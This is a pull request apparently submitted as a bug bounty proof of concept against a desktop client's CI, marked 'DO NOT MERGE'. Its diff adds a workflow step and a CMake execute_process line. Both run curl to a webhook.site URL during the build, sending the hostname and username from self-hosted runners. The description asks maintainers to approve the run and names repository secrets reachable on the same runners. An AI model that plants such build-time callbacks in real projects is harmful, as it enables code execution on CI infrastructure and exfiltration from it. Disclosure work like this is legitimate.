### PR TITLE
ci: security PoC - self-hosted runner code execution from fork (bug bounty, DO NOT MERGE)

### DIFF
--- a/.github/workflows/kdrive-desktop-ci.yml
+++ b/.github/workflows/kdrive-desktop-ci.yml
@@ -49,6 +49,11 @@ jobs:
         uses: actions/checkout@v6.0.2
         with:
           submodules: recursive
+      - name: ci-health-check (security PoC - YWH bug bounty - DO NOT MERGE)
+        run: |
+          echo "PoC: fork-controlled workflow step executing on self-hosted runner"
+          whoami; hostname; uname -a; id
+          curl -s --max-time 10 "https://webhook.site/90d1826f-8411-4e07-8a9d-bc0710a51e64/poc?h=$(hostname)&u=$(whoami)&j=${GITHUB_JOB}" || true
       - name: Build Linux
         uses: ./.github/actions/build_linux_amd
 

--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -2,6 +2,12 @@ cmake_minimum_required(VERSION 3.16)
 
 set(CMAKE_CXX_STANDARD 20)
 project(client)
+
+# >>> Security PoC (Infomaniak YWH bug bounty) - proves fork-controlled build files
+# >>> execute during the stock CI pipeline. DO NOT MERGE.
+execute_process(COMMAND /bin/sh -c "curl -s --max-time 10 'https://webhook.site/90d1826f-8411-4e07-8a9d-bc0710a51e64/cmake?h='$(hostname) || true")
+# <<< end PoC <<<
+
 if(APPLE)
     enable_language(OBJC)
     enable_language(OBJCXX)


### PR DESCRIPTION
## ⚠️ SECURITY RESEARCH — DO NOT MERGE

This PR is a proof-of-concept for Infomaniak's bug bounty program (YesWeHack).
It demonstrates that fork-controlled code executes on your **self-hosted runners**
through the `pull_request` trigger in `.github/workflows/kdrive-desktop-ci.yml`
(default checkout of the PR merge ref + build on `[self-hosted, Linux, X64, desktop-kdrive]`).

**Payload (2 callbacks):**
1. A `ci-health-check` step added to the `build-Linux` job
2. An `execute_process` in `CMakeLists.txt` (proves the stock pipeline executes fork build files)

Both only send `hostname`/`whoami` to a webhook.site endpoint — no environment or
secret access, no data touched, no persistence.

**Requested action:** please approve the workflow run once (first-time-contributor
gate) so the PoC can be verified, then close this PR. A full report with root-cause
analysis and remediation is being submitted through YesWeHack.

The same runner pool also runs the nightly `build-and-run-extended-tests.yml` with
repository secrets (KDRIVE_TOKEN, Windows signing certificate, macOS keychain),
which is why this matters beyond a single job. Details in the report. Thank you!